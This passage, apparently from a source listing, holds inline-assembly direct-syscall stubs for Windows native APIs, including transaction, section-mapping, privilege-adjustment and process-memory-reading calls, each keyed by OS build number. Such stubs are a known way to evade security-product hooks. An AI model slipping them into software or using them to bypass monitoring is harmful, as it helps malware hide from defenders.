40 | cmp word ptr [rax+0x120], 17763 \n\ 41 | je NtCreateFile_SystemCall_10_0_17763 \n\ 42 | cmp word ptr [rax+0x120], 18362 \n\ 43 | je NtCreateFile_SystemCall_10_0_18362 \n\ 44 | cmp word ptr [rax+0x120], 18363 \n\ 45 | je NtCreateFile_SystemCall_10_0_18363 \n\ 46 | cmp word ptr [rax+0x120], 19041 \n\ 47 | je NtCreateFile_SystemCall_10_0_19041 \n\ 48 | cmp word ptr [rax+0x120], 19042 \n\ 49 | je NtCreateFile_SystemCall_10_0_19042 \n\ 50 | jmp NtCreateFile_SystemCall_Unknown \n\ 51 | NtCreateFile_SystemCall_6_1_7600: \n\ 52 | mov eax, 0x0052 \n\ 53 | jmp NtCreateFile_Epilogue \n\ 54 | NtCreateFile_SystemCall_6_1_7601: \n\ 55 | mov eax, 0x0052 \n\ 56 | jmp NtCreateFile_Epilogue \n\ 57 | NtCreateFile_SystemCall_6_2_XXXX: \n\ 58 | mov eax, 0x0053 \n\ 59 | jmp NtCreateFile_Epilogue \n\ 60 | NtCreateFile_SystemCall_6_3_XXXX: \n\ 61 | mov eax, 0x0054 \n\ 62 | jmp NtCreateFile_Epilogue \n\ 63 | NtCreateFile_SystemCall_10_0_10240: \n\ 64 | mov eax, 0x0055 \n\ 65 | jmp NtCreateFile_Epilogue \n\ 66 | NtCreateFile_SystemCall_10_0_10586: \n\ 67 | mov eax, 0x0055 \n\ 68 | jmp NtCreateFile_Epilogue \n\ 69 | NtCreateFile_SystemCall_10_0_14393: \n\ 70 | mov eax, 0x0055 \n\ 71 | jmp NtCreateFile_Epilogue \n\ 72 | NtCreateFile_SystemCall_10_0_15063: \n\ 73 | mov eax, 0x0055 \n\ 74 | jmp NtCreateFile_Epilogue \n\ 75 | NtCreateFile_SystemCall_10_0_16299: \n\ 76 | mov eax, 0x0055 \n\ 77 | jmp NtCreateFile_Epilogue \n\ 78 | NtCreateFile_SystemCall_10_0_17134: \n\ 79 | mov eax, 0x0055 \n\ 80 | jmp NtCreateFile_Epilogue \n\ 81 | NtCreateFile_SystemCall_10_0_17763: \n\ 82 | mov eax, 0x0055 \n\ 83 | jmp NtCreateFile_Epilogue \n\ 84 | NtCreateFile_SystemCall_10_0_18362: \n\ 85 | mov eax, 0x0055 \n\ 86 | jmp NtCreateFile_Epilogue \n\ 87 | NtCreateFile_SystemCall_10_0_18363: \n\ 88 | mov eax, 0x0055 \n\ 89 | jmp NtCreateFile_Epilogue \n\ 90 | NtCreateFile_SystemCall_10_0_19041: \n\ 91 | mov eax, 0x0055 \n\ 92 | jmp NtCreateFile_Epilogue \n\ 93 | NtCreateFile_SystemCall_10_0_19042: \n\ 94 | mov eax, 0x0055 \n\ 95 | jmp NtCreateFile_Epilogue \n\ 96 | NtCreateFile_SystemCall_Unknown: \n\ 97 | ret \n\ 98 | NtCreateFile_Epilogue: \n\ 99 | mov r10, rcx \n\ 100 | syscall \n\ 101 | ret \n\ 102 | "); 103 | 104 | #define ZwCreateSection NtCreateSection 105 | __asm__("NtCreateSection: \n\ 106 | mov rax, gs:[0x60] \n\ 107 | NtCreateSection_Check_X_X_XXXX: \n\ 108 | cmp dword ptr [rax+0x118], 6 \n\ 109 | je NtCreateSection_Check_6_X_XXXX \n\ 110 | cmp dword ptr [rax+0x118], 10 \n\ 111 | je NtCreateSection_Check_10_0_XXXX \n\ 112 | jmp NtCreateSection_SystemCall_Unknown \n\ 113 | NtCreateSection_Check_6_X_XXXX: \n\ 114 | cmp dword ptr [rax+0x11c], 1 \n\ 115 | je NtCreateSection_Check_6_1_XXXX \n\ 116 | cmp dword ptr [rax+0x11c], 2 \n\ 117 | je NtCreateSection_SystemCall_6_2_XXXX \n\ 118 | cmp dword ptr [rax+0x11c], 3 \n\ 119 | je NtCreateSection_SystemCall_6_3_XXXX \n\ 120 | jmp NtCreateSection_SystemCall_Unknown \n\ 121 | NtCreateSection_Check_6_1_XXXX: \n\ 122 | cmp word ptr [rax+0x120], 7600 \n\ 123 | je NtCreateSection_SystemCall_6_1_7600 \n\ 124 | cmp word ptr [rax+0x120], 7601 \n\ 125 | je NtCreateSection_SystemCall_6_1_7601 \n\ 126 | jmp NtCreateSection_SystemCall_Unknown \n\ 127 | NtCreateSection_Check_10_0_XXXX: \n\ 128 | cmp word ptr [rax+0x120], 10240 \n\ 129 | je NtCreateSection_SystemCall_10_0_10240 \n\ 130 | cmp word ptr [rax+0x120], 10586 \n\ 131 | je NtCreateSection_SystemCall_10_0_10586 \n\ 132 | cmp word ptr [rax+0x120], 14393 \n\ 133 | je NtCreateSection_SystemCall_10_0_14393 \n\ 134 | cmp word ptr [rax+0x120], 15063 \n\ 135 | je NtCreateSection_SystemCall_10_0_15063 \n\ 136 | cmp word ptr [rax+0x120], 16299 \n\ 137 | je NtCreateSection_SystemCall_10_0_16299 \n\ 138 | cmp word ptr [rax+0x120], 17134 \n\ 139 | je NtCreateSection_SystemCall_10_0_17134 \n\ 140 | cmp word ptr [rax+0x120], 17763 \n\ 141 | je NtCreateSection_SystemCall_10_0_17763 \n\ 142 | cmp word ptr [rax+0x120], 18362 \n\ 143 | je NtCreateSection_SystemCall_10_0_18362 \n\ 144 | cmp word ptr [rax+0x120], 18363 \n\ 145 | je NtCreateSection_SystemCall_10_0_18363 \n\ 146 | cmp word ptr [rax+0x120], 19041 \n\ 147 | je NtCreateSection_SystemCall_10_0_19041 \n\ 148 | cmp word ptr [rax+0x120], 19042 \n\ 149 | je NtCreateSection_SystemCall_10_0_19042 \n\ 150 | jmp NtCreateSection_SystemCall_Unknown \n\ 151 | NtCreateSection_SystemCall_6_1_7600: \n\ 152 | mov eax, 0x0047 \n\ 153 | jmp NtCreateSection_Epilogue \n\ 154 | NtCreateSection_SystemCall_6_1_7601: \n\ 155 | mov eax, 0x0047 \n\ 156 | jmp NtCreateSection_Epilogue \n\ 157 | NtCreateSection_SystemCall_6_2_XXXX: \n\ 158 | mov eax, 0x0048 \n\ 159 | jmp NtCreateSection_Epilogue \n\ 160 | NtCreateSection_SystemCall_6_3_XXXX: \n\ 161 | mov eax, 0x0049 \n\ 162 | jmp NtCreateSection_Epilogue \n\ 163 | NtCreateSection_SystemCall_10_0_10240: \n\ 164 | mov eax, 0x004a \n\ 165 | jmp NtCreateSection_Epilogue \n\ 166 | NtCreateSection_SystemCall_10_0_10586: \n\ 167 | mov eax, 0x004a \n\ 168 | jmp NtCreateSection_Epilogue \n\ 169 | NtCreateSection_SystemCall_10_0_14393: \n\ 170 | mov eax, 0x004a \n\ 171 | jmp NtCreateSection_Epilogue \n\ 172 | NtCreateSection_SystemCall_10_0_15063: \n\ 173 | mov eax, 0x004a \n\ 174 | jmp NtCreateSection_Epilogue \n\ 175 | NtCreateSection_SystemCall_10_0_16299: \n\ 176 | mov eax, 0x004a \n\ 177 | jmp NtCreateSection_Epilogue \n\ 178 | NtCreateSection_SystemCall_10_0_17134: \n\ 179 | mov eax, 0x004a \n\ 180 | jmp NtCreateSection_Epilogue \n\ 181 | NtCreateSection_SystemCall_10_0_17763: \n\ 182 | mov eax, 0x004a \n\ 183 | jmp NtCreateSection_Epilogue \n\ 184 | NtCreateSection_SystemCall_10_0_18362: \n\ 185 | mov eax, 0x004a \n\ 186 | jmp NtCreateSection_Epilogue \n\ 187 | NtCreateSection_SystemCall_10_0_18363: \n\ 188 | mov eax, 0x004a \n\ 189 | jmp NtCreateSection_Epilogue \n\ 190 | NtCreateSection_SystemCall_10_0_19041: \n\ 191 | mov eax, 0x004a \n\ 192 | jmp NtCreateSection_Epilogue \n\ 193 | NtCreateSection_SystemCall_10_0_19042: \n\ 194 | mov eax, 0x004a \n\ 195 | jmp NtCreateSection_Epilogue \n\ 196 | NtCreateSection_SystemCall_Unknown: \n\ 197 | ret \n\ 198 | NtCreateSection_Epilogue: \n\ 199 | mov r10, rcx \n\ 200 | syscall \n\ 201 | ret \n\ 202 | "); 203 | 204 | #define ZwCreateTransaction NtCreateTransaction 205 | __asm__("NtCreateTransaction: \n\ 206 | mov rax, gs:[0x60] \n\ 207 | NtCreateTransaction_Check_X_X_XXXX: \n\ 208 | cmp dword ptr [rax+0x118], 6 \n\ 209 | je NtCreateTransaction_Check_6_X_XXXX \n\ 210 | cmp dword ptr [rax+0x118], 10 \n\ 211 | je NtCreateTransaction_Check_10_0_XXXX \n\ 212 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 213 | NtCreateTransaction_Check_6_X_XXXX: \n\ 214 | cmp dword ptr [rax+0x11c], 1 \n\ 215 | je NtCreateTransaction_Check_6_1_XXXX \n\ 216 | cmp dword ptr [rax+0x11c], 2 \n\ 217 | je NtCreateTransaction_SystemCall_6_2_XXXX \n\ 218 | cmp dword ptr [rax+0x11c], 3 \n\ 219 | je NtCreateTransaction_SystemCall_6_3_XXXX \n\ 220 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 221 | NtCreateTransaction_Check_6_1_XXXX: \n\ 222 | cmp word ptr [rax+0x120], 7600 \n\ 223 | je NtCreateTransaction_SystemCall_6_1_7600 \n\ 224 | cmp word ptr [rax+0x120], 7601 \n\ 225 | je NtCreateTransaction_SystemCall_6_1_7601 \n\ 226 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 227 | NtCreateTransaction_Check_10_0_XXXX: \n\ 228 | cmp word ptr [rax+0x120], 10240 \n\ 229 | je NtCreateTransaction_SystemCall_10_0_10240 \n\ 230 | cmp word ptr [rax+0x120], 10586 \n\ 231 | je NtCreateTransaction_SystemCall_10_0_10586 \n\ 232 | cmp word ptr [rax+0x120], 14393 \n\ 233 | je NtCreateTransaction_SystemCall_10_0_14393 \n\ 234 | cmp word ptr [rax+0x120], 15063 \n\ 235 | je NtCreateTransaction_SystemCall_10_0_15063 \n\ 236 | cmp word ptr [rax+0x120], 16299 \n\ 237 | je NtCreateTransaction_SystemCall_10_0_16299 \n\ 238 | cmp word ptr [rax+0x120], 17134 \n\ 239 | je NtCreateTransaction_SystemCall_10_0_17134 \n\ 240 | cmp word ptr [rax+0x120], 17763 \n\ 241 | je NtCreateTransaction_SystemCall_10_0_17763 \n\ 242 | cmp word ptr [rax+0x120], 18362 \n\ 243 | je NtCreateTransaction_SystemCall_10_0_18362 \n\ 244 | cmp word ptr [rax+0x120], 18363 \n\ 245 | je NtCreateTransaction_SystemCall_10_0_18363 \n\ 246 | cmp word ptr [rax+0x120], 19041 \n\ 247 | je NtCreateTransaction_SystemCall_10_0_19041 \n\ 248 | cmp word ptr [rax+0x120], 19042 \n\ 249 | je NtCreateTransaction_SystemCall_10_0_19042 \n\ 250 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 251 | NtCreateTransaction_SystemCall_6_1_7600: \n\ 252 | mov eax, 0x00a8 \n\ 253 | jmp NtCreateTransaction_Epilogue \n\ 254 | NtCreateTransaction_SystemCall_6_1_7601: \n\ 255 | mov eax, 0x00a8 \n\ 256 | jmp NtCreateTransaction_Epilogue \n\ 257 | NtCreateTransaction_SystemCall_6_2_XXXX: \n\ 258 | mov eax, 0x00b3 \n\ 259 | jmp NtCreateTransaction_Epilogue \n\ 260 | NtCreateTransaction_SystemCall_6_3_XXXX: \n\ 261 | mov eax, 0x00b5 \n\ 262 | jmp NtCreateTransaction_Epilogue \n\ 263 | NtCreateTransaction_SystemCall_10_0_10240: \n\ 264 | mov eax, 0x00b8 \n\ 265 | jmp NtCreateTransaction_Epilogue \n\ 266 | NtCreateTransaction_SystemCall_10_0_10586: \n\ 267 | mov eax, 0x00b9 \n\ 268 | jmp NtCreateTransaction_Epilogue \n\ 269 | NtCreateTransaction_SystemCall_10_0_14393: \n\ 270 | mov eax, 0x00bb \n\ 271 | jmp NtCreateTransaction_Epilogue \n\ 272 | NtCreateTransaction_SystemCall_10_0_15063: \n\ 273 | mov eax, 0x00be \n\ 274 | jmp NtCreateTransaction_Epilogue \n\ 275 | NtCreateTransaction_SystemCall_10_0_16299: \n\ 276 | mov eax, 0x00bf \n\ 277 | jmp NtCreateTransaction_Epilogue \n\ 278 | NtCreateTransaction_SystemCall_10_0_17134: \n\ 279 | mov eax, 0x00c0 \n\ 280 | jmp NtCreateTransaction_Epilogue \n\ 281 | NtCreateTransaction_SystemCall_10_0_17763: \n\ 282 | mov eax, 0x00c1 \n\ 283 | jmp NtCreateTransaction_Epilogue \n\ 284 | NtCreateTransaction_SystemCall_10_0_18362: \n\ 285 | mov eax, 0x00c2 \n\ 286 | jmp NtCreateTransaction_Epilogue \n\ 287 | NtCreateTransaction_SystemCall_10_0_18363: \n\ 288 | mov eax, 0x00c2 \n\ 289 | jmp NtCreateTransaction_Epilogue \n\ 290 | NtCreateTransaction_SystemCall_10_0_19041: \n\ 291 | mov eax, 0x00c6 \n\ 292 | jmp NtCreateTransaction_Epilogue \n\ 293 | NtCreateTransaction_SystemCall_10_0_19042: \n\ 294 | mov eax, 0x00c6 \n\ 295 | jmp NtCreateTransaction_Epilogue \n\ 296 | NtCreateTransaction_SystemCall_Unknown: \n\ 297 | ret \n\ 298 | NtCreateTransaction_Epilogue: \n\ 299 | mov r10, rcx \n\ 300 | syscall \n\ 301 | ret \n\ 302 | "); 303 | 304 | #define ZwMapViewOfSection NtMapViewOfSection 305 | __asm__("NtMapViewOfSection: \n\ 306 | mov rax, gs:[0x60] \n\ 307 | NtMapViewOfSection_Check_X_X_XXXX: \n\ 308 | cmp dword ptr [rax+0x118], 6 \n\ 309 | je NtMapViewOfSection_Check_6_X_XXXX \n\ 310 | cmp dword ptr [rax+0x118], 10 \n\ 311 | je NtMapViewOfSection_Check_10_0_XXXX \n\ 312 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 313 | NtMapViewOfSection_Check_6_X_XXXX: \n\ 314 | cmp dword ptr [rax+0x11c], 1 \n\ 315 | je NtMapViewOfSection_Check_6_1_XXXX \n\ 316 | cmp dword ptr [rax+0x11c], 2 \n\ 317 | je NtMapViewOfSection_SystemCall_6_2_XXXX \n\ 318 | cmp dword ptr [rax+0x11c], 3 \n\ 319 | je NtMapViewOfSection_SystemCall_6_3_XXXX \n\ 320 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 321 | NtMapViewOfSection_Check_6_1_XXXX: \n\ 322 | cmp word ptr [rax+0x120], 7600 \n\ 323 | je NtMapViewOfSection_SystemCall_6_1_7600 \n\ 324 | cmp word ptr [rax+0x120], 7601 \n\ 325 | je NtMapViewOfSection_SystemCall_6_1_7601 \n\ 326 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 327 | NtMapViewOfSection_Check_10_0_XXXX: \n\ 328 | cmp word ptr [rax+0x120], 10240 \n\ 329 | je NtMapViewOfSection_SystemCall_10_0_10240 \n\ 330 | cmp word ptr [rax+0x120], 10586 \n\ 331 | je NtMapViewOfSection_SystemCall_10_0_10586 \n\ 332 | cmp word ptr [rax+0x120], 14393 \n\ 333 | je NtMapViewOfSection_SystemCall_10_0_14393 \n\ 334 | cmp word ptr [rax+0x120], 15063 \n\ 335 | je NtMapViewOfSection_SystemCall_10_0_15063 \n\ 336 | cmp word ptr [rax+0x120], 16299 \n\ 337 | je NtMapViewOfSection_SystemCall_10_0_16299 \n\ 338 | cmp word ptr [rax+0x120], 17134 \n\ 339 | je NtMapViewOfSection_SystemCall_10_0_17134 \n\ 340 | cmp word ptr [rax+0x120], 17763 \n\ 341 | je NtMapViewOfSection_SystemCall_10_0_17763 \n\ 342 | cmp word ptr [rax+0x120], 18362 \n\ 343 | je NtMapViewOfSection_SystemCall_10_0_18362 \n\ 344 | cmp word ptr [rax+0x120], 18363 \n\ 345 | je NtMapViewOfSection_SystemCall_10_0_18363 \n\ 346 | cmp word ptr [rax+0x120], 19041 \n\ 347 | je NtMapViewOfSection_SystemCall_10_0_19041 \n\ 348 | cmp word ptr [rax+0x120], 19042 \n\ 349 | je NtMapViewOfSection_SystemCall_10_0_19042 \n\ 350 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 351 | NtMapViewOfSection_SystemCall_6_1_7600: \n\ 352 | mov eax, 0x0025 \n\ 353 | jmp NtMapViewOfSection_Epilogue \n\ 354 | NtMapViewOfSection_SystemCall_6_1_7601: \n\ 355 | mov eax, 0x0025 \n\ 356 | jmp NtMapViewOfSection_Epilogue \n\ 357 | NtMapViewOfSection_SystemCall_6_2_XXXX: \n\ 358 | mov eax, 0x0026 \n\ 359 | jmp NtMapViewOfSection_Epilogue \n\ 360 | NtMapViewOfSection_SystemCall_6_3_XXXX: \n\ 361 | mov eax, 0x0027 \n\ 362 | jmp NtMapViewOfSection_Epilogue \n\ 363 | NtMapViewOfSection_SystemCall_10_0_10240: \n\ 364 | mov eax, 0x0028 \n\ 365 | jmp NtMapViewOfSection_Epilogue \n\ 366 | NtMapViewOfSection_SystemCall_10_0_10586: \n\ 367 | mov eax, 0x0028 \n\ 368 | jmp NtMapViewOfSection_Epilogue \n\ 369 | NtMapViewOfSection_SystemCall_10_0_14393: \n\ 370 | mov eax, 0x0028 \n\ 371 | jmp NtMapViewOfSection_Epilogue \n\ 372 | NtMapViewOfSection_SystemCall_10_0_15063: \n\ 373 | mov eax, 0x0028 \n\ 374 | jmp NtMapViewOfSection_Epilogue \n\ 375 | NtMapViewOfSection_SystemCall_10_0_16299: \n\ 376 | mov eax, 0x0028 \n\ 377 | jmp NtMapViewOfSection_Epilogue \n\ 378 | NtMapViewOfSection_SystemCall_10_0_17134: \n\ 379 | mov eax, 0x0028 \n\ 380 | jmp NtMapViewOfSection_Epilogue \n\ 381 | NtMapViewOfSection_SystemCall_10_0_17763: \n\ 382 | mov eax, 0x0028 \n\ 383 | jmp NtMapViewOfSection_Epilogue \n\ 384 | NtMapViewOfSection_SystemCall_10_0_18362: \n\ 385 | mov eax, 0x0028 \n\ 386 | jmp NtMapViewOfSection_Epilogue \n\ 387 | NtMapViewOfSection_SystemCall_10_0_18363: \n\ 388 | mov eax, 0x0028 \n\ 389 | jmp NtMapViewOfSection_Epilogue \n\ 390 | NtMapViewOfSection_SystemCall_10_0_19041: \n\ 391 | mov eax, 0x0028 \n\ 392 | jmp NtMapViewOfSection_Epilogue \n\ 393 | NtMapViewOfSection_SystemCall_10_0_19042: \n\ 394 | mov eax, 0x0028 \n\ 395 | jmp NtMapViewOfSection_Epilogue \n\ 396 | NtMapViewOfSection_SystemCall_Unknown: \n\ 397 | ret \n\ 398 | NtMapViewOfSection_Epilogue: \n\ 399 | mov r10, rcx \n\ 400 | syscall \n\ 401 | ret \n\ 402 | "); 403 | 404 | #define ZwAdjustPrivilegesToken NtAdjustPrivilegesToken 405 | __asm__("NtAdjustPrivilegesToken: \n\ 406 | mov rax, gs:[0x60] \n\ 407 | NtAdjustPrivilegesToken_Check_X_X_XXXX: \n\ 408 | cmp dword ptr [rax+0x118], 6 \n\ 409 | je NtAdjustPrivilegesToken_Check_6_X_XXXX \n\ 410 | cmp dword ptr [rax+0x118], 10 \n\ 411 | je NtAdjustPrivilegesToken_Check_10_0_XXXX \n\ 412 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 413 | NtAdjustPrivilegesToken_Check_6_X_XXXX: \n\ 414 | cmp dword ptr [rax+0x11c], 1 \n\ 415 | je NtAdjustPrivilegesToken_Check_6_1_XXXX \n\ 416 | cmp dword ptr [rax+0x11c], 2 \n\ 417 | je NtAdjustPrivilegesToken_SystemCall_6_2_XXXX \n\ 418 | cmp dword ptr [rax+0x11c], 3 \n\ 419 | je NtAdjustPrivilegesToken_SystemCall_6_3_XXXX \n\ 420 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 421 | NtAdjustPrivilegesToken_Check_6_1_XXXX: \n\ 422 | cmp word ptr [rax+0x120], 7600 \n\ 423 | je NtAdjustPrivilegesToken_SystemCall_6_1_7600 \n\ 424 | cmp word ptr [rax+0x120], 7601 \n\ 425 | je NtAdjustPrivilegesToken_SystemCall_6_1_7601 \n\ 426 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 427 | NtAdjustPrivilegesToken_Check_10_0_XXXX: \n\ 428 | cmp word ptr [rax+0x120], 10240 \n\ 429 | je NtAdjustPrivilegesToken_SystemCall_10_0_10240 \n\ 430 | cmp word ptr [rax+0x120], 10586 \n\ 431 | je NtAdjustPrivilegesToken_SystemCall_10_0_10586 \n\ 432 | cmp word ptr [rax+0x120], 14393 \n\ 433 | je NtAdjustPrivilegesToken_SystemCall_10_0_14393 \n\ 434 | cmp word ptr [rax+0x120], 15063 \n\ 435 | je NtAdjustPrivilegesToken_SystemCall_10_0_15063 \n\ 436 | cmp word ptr [rax+0x120], 16299 \n\ 437 | je NtAdjustPrivilegesToken_SystemCall_10_0_16299 \n\ 438 | cmp word ptr [rax+0x120], 17134 \n\ 439 | je NtAdjustPrivilegesToken_SystemCall_10_0_17134 \n\ 440 | cmp word ptr [rax+0x120], 17763 \n\ 441 | je NtAdjustPrivilegesToken_SystemCall_10_0_17763 \n\ 442 | cmp word ptr [rax+0x120], 18362 \n\ 443 | je NtAdjustPrivilegesToken_SystemCall_10_0_18362 \n\ 444 | cmp word ptr [rax+0x120], 18363 \n\ 445 | je NtAdjustPrivilegesToken_SystemCall_10_0_18363 \n\ 446 | cmp word ptr [rax+0x120], 19041 \n\ 447 | je NtAdjustPrivilegesToken_SystemCall_10_0_19041 \n\ 448 | cmp word ptr [rax+0x120], 19042 \n\ 449 | je NtAdjustPrivilegesToken_SystemCall_10_0_19042 \n\ 450 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 451 | NtAdjustPrivilegesToken_SystemCall_6_1_7600: \n\ 452 | mov eax, 0x003e \n\ 453 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 454 | NtAdjustPrivilegesToken_SystemCall_6_1_7601: \n\ 455 | mov eax, 0x003e \n\ 456 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 457 | NtAdjustPrivilegesToken_SystemCall_6_2_XXXX: \n\ 458 | mov eax, 0x003f \n\ 459 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 460 | NtAdjustPrivilegesToken_SystemCall_6_3_XXXX: \n\ 461 | mov eax, 0x0040 \n\ 462 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 463 | NtAdjustPrivilegesToken_SystemCall_10_0_10240: \n\ 464 | mov eax, 0x0041 \n\ 465 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 466 | NtAdjustPrivilegesToken_SystemCall_10_0_10586: \n\ 467 | mov eax, 0x0041 \n\ 468 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 469 | NtAdjustPrivilegesToken_SystemCall_10_0_14393: \n\ 470 | mov eax, 0x0041 \n\ 471 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 472 | NtAdjustPrivilegesToken_SystemCall_10_0_15063: \n\ 473 | mov eax, 0x0041 \n\ 474 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 475 | NtAdjustPrivilegesToken_SystemCall_10_0_16299: \n\ 476 | mov eax, 0x0041 \n\ 477 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 478 | NtAdjustPrivilegesToken_SystemCall_10_0_17134: \n\ 479 | mov eax, 0x0041 \n\ 480 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 481 | NtAdjustPrivilegesToken_SystemCall_10_0_17763: \n\ 482 | mov eax, 0x0041 \n\ 483 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 484 | NtAdjustPrivilegesToken_SystemCall_10_0_18362: \n\ 485 | mov eax, 0x0041 \n\ 486 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 487 | NtAdjustPrivilegesToken_SystemCall_10_0_18363: \n\ 488 | mov eax, 0x0041 \n\ 489 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 490 | NtAdjustPrivilegesToken_SystemCall_10_0_19041: \n\ 491 | mov eax, 0x0041 \n\ 492 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 493 | NtAdjustPrivilegesToken_SystemCall_10_0_19042: \n\ 494 | mov eax, 0x0041 \n\ 495 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 496 | NtAdjustPrivilegesToken_SystemCall_Unknown: \n\ 497 | ret \n\ 498 | NtAdjustPrivilegesToken_Epilogue: \n\ 499 | mov r10, rcx \n\ 500 | syscall \n\ 501 | ret \n\ 502 | "); 503 | 504 | #define ZwReadVirtualMemory NtReadVirtualMemory 505 | __asm__("NtReadVirtualMemory: \n\ 506 | mov rax, gs:[0x60] \n\ 507 | NtReadVirtualMemory_Check_X_X_XXXX: \n\ 508 | cmp dword ptr [rax+0x118], 6 \n\ 509 | je NtReadVirtualMemory_Check_6_X_XXXX \n\ 510 | cmp dword ptr [rax+0x118], 10 \n\ 511 | je NtReadVirtualMemory_Check_10_0_XXXX \n\ 512 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 513 | NtReadVirtualMemory_Check_6_X_XXXX: \n\ 514 | cmp dword ptr [rax+0x11c], 1 \n\ 515 | je NtReadVirtualMemory_Check_6_1_XXXX \n\ 516 | cmp dword ptr [rax+0x11c], 2 \n\ 517 | je NtReadVirtualMemory_SystemCall_6_2_XXXX \n\ 518 | cmp dword ptr [rax+0x11c], 3 \n\ 519 | je NtReadVirtualMemory_SystemCall_6_3_XXXX \n\ 520 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 521 | NtReadVirtualMemory_Check_6_1_XXXX: \n\ 522 | cmp word ptr [rax+0x120], 7600 \n\ 523 | je NtReadVirtualMemory_SystemCall_6_1_7600 \n\ 524 | cmp word ptr [rax+0x120], 7601 \n\ 525 | je NtReadVirtualMemory_SystemCall_6_1_7601 \n\ 526 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 527 | NtReadVirtualMemory_Check_10_0_XXXX: \n\ 528 | cmp word ptr [rax+0x120], 10240 \n\ 529 | je NtReadVirtualMemory_SystemCall_10_0_10240 \n\ 530 | cmp word ptr [rax+0x120], 10586 \n\ 531 | je NtReadVirtualMemory_SystemCall_10_0_10586 \n\ 532 | cmp word ptr [rax+0x120], 14393 \n\ 533 | je NtReadVirtualMemory_SystemCall_10_0_14393 \n\ 534 | cmp word ptr [rax+0x120], 15063 \n\ 535 | je NtReadVirtualMemory_SystemCall_10_0_15063 \n\ 536 | cmp word ptr [rax+0x120], 16299 \n\ 537 | je NtReadVirtualMemory_SystemCall_10_0_16299 \n\ 538 | cmp word ptr [rax+0x120], 17134 \n\ 539 | je NtReadVirtualMemory_SystemCall_10_0_17134 \n\ 540 | cmp word ptr [rax+0x120], 17763 \n\ 541 | je NtReadVirtualMemory_SystemCall_10_0_17763 \n\ 542 | cmp word ptr [rax+0x120], 18362 \n\ 543 | je NtReadVirtualMemory_SystemCall_10_0_18362 \n\ 544 | cmp word ptr [rax+0x120], 18363 \n\ 545 | je NtReadVirtualMemory_SystemCall_10_0_18363 \n\ 546 | cmp word ptr [rax+0x120], 19041 \n\ 547 | je NtReadVirtualMemory_SystemCall_10_0_19041 \n\ 548 | cmp word ptr [rax+0x120], 19042 \n\ 549 | je NtReadVirtualMemory_SystemCall_10_0_19042 \n\ 550 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 551 | NtReadVirtualMemory_SystemCall_6_1_7600: \n\ 552 | mov eax, 0x003c \n\ 553 | jmp NtReadVirtualMemory_Epilogue \n\ 554 | NtReadVirtualMemory_SystemCall_6_1_7601: \n\ 555 | mov eax, 0x003c \n\ 556 | jmp NtReadVirtualMemory_Epilogue \n\ 557 | NtReadVirtualMemory_SystemCall_6_2_XXXX: \n\ 558 | mov eax, 0x003d \n\ 559 | jmp NtReadVirtualMemory_Epilogue \n\ 560 | NtReadVirtualMemory_SystemCall_6_3_XXXX: \n\ 561 | mov eax, 0x003e \n\ 562 | jmp NtReadVirtualMemory_Epilogue \n\ 563 | NtReadVirtualMemory_SystemCall_10_0_10240: \n\ 564 | mov eax, 0x003f \n\ 565 | jmp NtReadVirtualMemory_Epilogue \n\ 566 | NtReadVirtualMemory_SystemCall_10_0_10586: \n\ 567 | mov eax, 0x003f \n\ 568 | jmp NtReadVirtualMemory_Epilogue \n\ 569 | NtReadVirtualMemory_SystemCall_10_0_14393: \n\ 570 | mov eax, 0x003f \n\ 571 | jmp NtReadVirtualMemory_Epilogue \n\ 572 | NtReadVirtualMemory_SystemCall_10_0_15063: \n\ 573 | mov eax, 0x003f \n\ 574 | jmp NtReadVirtualMemory_Epilogue \n\ 575 | NtReadVirtualMemory_SystemCall_10_0_16299: \n\ 576 | mov eax, 0x003f \n\ 577 | jmp NtReadVirtualMemory_Epilogue \n\ 578 | NtReadVirtualMemory_SystemCall_10_0_17134: \n\ 579 | mov eax, 0x003f \n\ 580 | jmp NtReadVirtualMemory_Epilogue \n\ 581 | NtReadVirtualMemory_SystemCall_10_0_17763: \n\ 582 | mov eax, 0x003f \n\ 583 | jmp NtReadVirtualMemory_Epilogue \n\ 584 | NtReadVirtualMemory_SystemCall_10_0_18362: \n\ 585 | mov eax, 0x003f \n\ 586 | jmp NtReadVirtualMemory_Epilogue \n\ 587 | NtReadVirtualMemory_SystemCall_10_0_18363: \n\ 588 | mov eax, 0x003f \n\ 589 | jmp NtReadVirtualMemory_Epilogue \n\ 590 | NtReadVirtualMemory_SystemCall_10_0_19041: \n\ 591 | mov eax, 0x003f \n\ 592 | jmp NtReadVirtualMemory_Epilogue \n\ 593 | NtReadVirtualMemory_SystemCall_10_0_19042: \n\ 594 | mov eax, 0x003f \n\ 595 | jmp NtReadVirtualMemory_Epilogue \n\ 596 | NtReadVirtualMemory_SystemCall_Unknown: \n\ 597 | ret \n\ 598 | NtReadVirtualMemory_Epilogue: \n\ 599 | mov r10, rcx \n\ 600 | syscall \n\ 601 | ret \n\ 602 | "); 603 | 604 | #define 